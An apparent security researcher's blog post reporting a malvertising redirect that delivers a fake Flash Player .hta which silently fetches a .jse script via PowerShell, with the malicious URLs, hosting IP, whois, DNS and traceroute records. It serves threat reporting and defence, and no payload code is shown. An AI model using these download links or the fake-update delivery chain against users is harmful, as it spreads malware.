Fake Flashplayer Update Via Exploit Using Adverts On Legit Site

For a change this is about an exploit, rather than a malspam email.

I was reading posts on a well known tech forum, when I got a sudden divert and a .hta file attempted to download. Of course I immediately saved the file, rather than letting it run. I won’t name the tech forum at this stage, to allow the admin time to investigate and check what advert I think caused it. It was an advert for HP laserjet printers that was not using flash but did have moving images. I think the divert happened when I moused over the advert whilst scrolling down the page.

Anyway the divert was to https://eiyahpornhub.org/5101454380687/6481137a7f7240574c225b198be9c16d/34cacd8a11e39b3bbc01955b9b1eac15.html ( note the “safe Secure ” https: link) HTTPS does not mean safe. It means secure from interception in normal circumstances.

Update: it looks like the link is dynamically created and changes on each visit from the referrer ( the dodgy advert) . I haven’t been able to get back to the site and get a 404 every time. I can get the .jse file and multiple visits to that is allowed. Lots of exploits refuse to let the same IP & referral id more than 1 attempt to visits to stop antivirus companies and researchers investigating them easily.

This downloaded FlashPlayer.hta ( VirusTotal ) ( Payload Security) which is just an instruction to the computer to use PowerShell to download silently in the background https://eiyahpornhub.org/5101454380687/1491733844471718/FlashPlayer.jse ( VirusTotal ) ( Payload Security) which isn’t showing any further downloads, so I have no idea at this stage what the end malware is intended to be.

This seems very similar to the campaign posted on https://www.bleepingcomputer.com/news/security/skype-malvertising-campaign-pushes-fake-flash-player/

In both cases nobody has actually got the final payload. All I managed to get was https://eiyahpornhub.org/67d05900efa21668e417c34f5adb32e1.mp4 ( now down) VirusTotal | MALWR which is just plain txt ( possibly encrypted) that would need the original jse file to decrypt it to something useful. (If it is encrypted txt and not just some sort of identity string )

Whole package as a P/W zip file “infected” 9 april_ fake_flash_player_malvertising just in case some other researcher can make use of it

eiyahpornhub.org was registered yesterday 8 April 2021 https://whois.icann.org/en/lookup?name=eiyahpornhub.org I very much doubt that the listed registrants details are correct. They are probably stolen details and credit card used to register this domain

It appears to be hosted on 192.129.162.108 allegedly used by a Russian entity

Network Whois Record

 

Queried rwhois.hostwinds.com with “192.129.162.108“…

%rwhois V-1.5:003fff:00 rwhois.hostwinds.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:Hostwinds Block-192.129.162.108/32
network:Auth-Area:192.129.162.108/32
network:Network-Name:SergSoft Network
network:IP-Network:192.129.162.108/32
network:IP-Network-Block:192.129.162.108 - 192.129.162.108
network:Customer Organization:SergSoft
network:Customer Address;I:Krasniy Kazanetz 1-2-88
network:Customer City;I:Moscow
network:Customer State/Province;I:RU
network:Customer Postal Code;I:111395
network:Customer Country Code;I:RU
network:Organization;I:Hostwinds LLC
network:Tech-Contact;I:[email protected]
network:Admin-Contact;I:[email protected]
network:Abuse-Contact;I:[email protected]

%ok

Queried whois.arin.net with “n 192.129.162.108“…

NetRange:       192.129.128.0 - 192.129.255.255
CIDR:           192.129.128.0/17
NetName:        HOSTWINDS-17-1
NetHandle:      NET-192-129-128-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS54290
Organization:   Hostwinds LLC. (HL-29)
RegDate:        2013-01-30
Updated:        2013-12-19
Ref:            https://whois.arin.net/rest/net/NET-192-129-128-0-1


OrgName:        Hostwinds LLC.
OrgId:          HL-29
Address:        1002 Reunion Center, 9 East 4th Street
City:           Tulsa
StateProv:      OK
PostalCode:     74103
Country:        US
RegDate:        2011-11-30
Updated:        2017-01-28
Comment:        http://www.hostwinds.com
Comment:        Standard NOC hours are 6:00am to 12:00am CST
Ref:            https://whois.arin.net/rest/org/HL-29

ReferralServer:  rwhois://rwhois.hostwinds.com:4321

OrgTechHandle: HNOC9-ARIN
OrgTechName:   Hostwinds Network Operations Center
OrgTechPhone:  +1-206-886-0665
OrgTechEmail:  [email protected]
OrgTechRef:    https://whois.arin.net/rest/poc/HNOC9-ARIN

OrgAbuseHandle: HAC3-ARIN
OrgAbuseName:   Hostwinds Abuse Center
OrgAbusePhone:  +1-206-886-0665
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    https://whois.arin.net/rest/poc/HAC3-ARIN

OrgNOCHandle: HNOC9-ARIN
OrgNOCName:   Hostwinds Network Operations Center
OrgNOCPhone:  +1-206-886-0665
OrgNOCEmail:  [email protected]
OrgNOCRef:    https://whois.arin.net/rest/poc/HNOC9-ARIN

DNS Records

name class type data time to live
eiyahpornhub.org IN SOA
server: ns21.cloudns.net
email: [email protected]
serial: 2017040912
refresh: 7200
retry: 1800
expire: 1209600
minimum ttl: 3600
3600s (01:00:00)
eiyahpornhub.org IN A 192.129.162.108 60s (00:01:00)
eiyahpornhub.org IN MX
preference: 10
exchange: mail.eiyahpornhub.org
60s (00:01:00)
eiyahpornhub.org IN NS ns23.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns22.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns24.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns22.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns21.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns23.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns24.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns21.cloudns.net 3600s (01:00:00)
108.162.129.192.in-addr.arpa IN PTR client-192-129-162-108.hostwindsdns.com 14400s (04:00:00)
162.129.192.in-addr.arpa IN SOA
server: 162.129.192.in-addr.arpa
email: [email protected]
serial: 2017032407
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 3600
600s (00:10:00)

Traceroute

Tracing route to eiyahpornhub.org [192.129.162.108]

hop rtt rtt rtt ip address fully qualified domain name
1 177 0 30 208.101.16.73 49.10.65d0.ip4.static.sl-reverse.com
2 0 0 0 66.228.118.153 ae11.dar01.sr01.dal01.networklayer.com
3 0 0 0 173.192.18.254 ae14.bbr02.eq01.dal03.networklayer.com
4 0 0 0 4.35.184.45 ae57.edge6.dallas3.level3.net
5 * * *
6 * * *
7 0 2 5 23.238.104.129 client-23-238-104-129.hostwindsdns.com
8 1 0 0 192.129.162.108 client-192-129-162-108.hostwindsdns.com